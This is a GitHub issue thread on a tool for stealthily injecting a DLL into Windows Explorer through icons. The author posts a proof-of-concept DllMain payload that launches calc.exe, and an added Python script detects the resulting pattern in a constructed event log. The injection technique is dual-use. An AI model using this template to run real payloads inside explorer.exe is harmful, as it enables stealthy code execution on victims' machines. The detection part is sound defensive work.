0xda568 / IconJector

Unorthodox and stealthy way to inject a DLL into the explorer using icons

Details on payload DLL request #1

Open Karkas66 opened 2 months ago

Karkas66 commented 2 months ago

Could you please drop some details on the DLL that you crafted. It does not publish any export functions, and my own universal sideloading DLL will not trigger the embedded payload when it is loaded by the explorer.

0xda568 commented 2 months ago

Hey, sorry for the late response. The DLL just creates a calc.exe process when it gets attached to a process. After compiling it, I just added a random icon to it using Resource Hacker, but it should also work without an icon.

This is the code I used; make sure to compile the DLL for x64 (if you're running an x64 system):

// dllmain.cpp : Defines the entry point for the DLL application.
// <windows.h> replaces the Visual Studio precompiled header ("pch.h") so the
// file also builds outside the default project template.
#include <windows.h>

// The DLL exports nothing; its only behaviour is the DllMain entry point,
// which the loader calls with DLL_PROCESS_ATTACH as soon as the module is
// mapped into a process.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){
    switch (ul_reason_for_call){
    case DLL_PROCESS_ATTACH: {

        // Explicit wide-character structures and API so the L"..." path
        // compiles whether or not UNICODE is defined for the project.
        STARTUPINFOW si;
        PROCESS_INFORMATION pi;

        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));

        // Spawn calc.exe as a visible sign that the DLL was loaded.
        if (CreateProcessW(L"C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
            // The handles are not needed afterwards; close them to avoid leaks.
            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
        }

        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
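From a defender's side, the behaviour described in this thread leaves a recognisable trace: explorer.exe loads a DLL from a location outside the Windows directory and, moments later, spawns a child process. The script below is an added example, not code from this repository or its author; it correlates those two event types over a constructed, Sysmon-style text log (the log format, field names, timestamps and paths are all invented for the example) and reports each untrusted-module load in explorer.exe that is followed within a short window by a child process of that same explorer.exe instance.

```python
"""Flag the 'untrusted DLL loaded into explorer.exe, then explorer.exe spawns a
child' pattern in a simple text event log. Added example with constructed data."""
from datetime import datetime, timedelta

# Constructed sample log (not from the page or any real system). One event per
# line: <ISO timestamp> <event kind> key=value ... ; values contain no spaces.
SAMPLE_LOG = r"""
2024-05-01T10:00:00 ImageLoaded ProcessId=1234 Image=C:\Windows\explorer.exe ImageLoaded=C:\Windows\System32\shell32.dll
2024-05-01T10:00:05 ImageLoaded ProcessId=1234 Image=C:\Windows\explorer.exe ImageLoaded=C:\Users\bob\Pictures\icon.dll
2024-05-01T10:00:06 ProcessCreate ParentProcessId=1234 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\calc.exe
2024-05-01T10:09:00 ProcessCreate ParentProcessId=1234 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe
2024-05-01T10:10:00 ImageLoaded ProcessId=5678 Image=C:\Windows\System32\svchost.exe ImageLoaded=C:\Users\bob\Pictures\icon.dll
""".strip()

# Modules under the Windows directory are treated as trusted for this example;
# anything else (user profile, temp, removable media) is "untrusted".
TRUSTED_PREFIX = "c:\\windows\\"


def parse_event(line):
    """Turn one log line into a dict with a datetime 'ts', a 'kind' and its fields."""
    ts_str, kind, *fields = line.split()
    event = {"ts": datetime.fromisoformat(ts_str), "kind": kind}
    event.update(f.split("=", 1) for f in fields)
    return event


def is_untrusted_module(path):
    """True for a DLL that lives outside the Windows directory."""
    p = path.lower()
    return p.endswith(".dll") and not p.startswith(TRUSTED_PREFIX)


def find_suspicious(lines, target="explorer.exe", window=timedelta(seconds=30)):
    """Return (module, child_image) pairs where a process whose image ends with
    `target` loaded an untrusted DLL and then created a child within `window`."""
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    untrusted_loads = {}  # pid -> [(ts, module path)]
    hits = []
    for ev in events:
        if (ev["kind"] == "ImageLoaded"
                and ev["Image"].lower().endswith(target)
                and is_untrusted_module(ev["ImageLoaded"])):
            untrusted_loads.setdefault(ev["ProcessId"], []).append((ev["ts"], ev["ImageLoaded"]))
        elif ev["kind"] == "ProcessCreate" and ev["ParentImage"].lower().endswith(target):
            # Only loads that happened shortly before the child was created count.
            for load_ts, module in untrusted_loads.get(ev["ParentProcessId"], []):
                if timedelta(0) <= ev["ts"] - load_ts <= window:
                    hits.append((module, ev["Image"]))
    return hits


if __name__ == "__main__":
    for module, child in find_suspicious(SAMPLE_LOG.splitlines()):
        print(f"explorer.exe loaded {module} and then spawned {child}")
```

In the constructed log only the icon.dll load followed one second later by calc.exe is reported; the notepad.exe launch nine minutes later falls outside the window, and the same DLL loaded by svchost.exe is ignored because the rule keys on the explorer.exe process that was targeted. The 30-second window and the "trusted means under C:\Windows" rule are simplifications chosen for the example; a production rule would also consider signer information and the full set of directories a given environment treats as trusted.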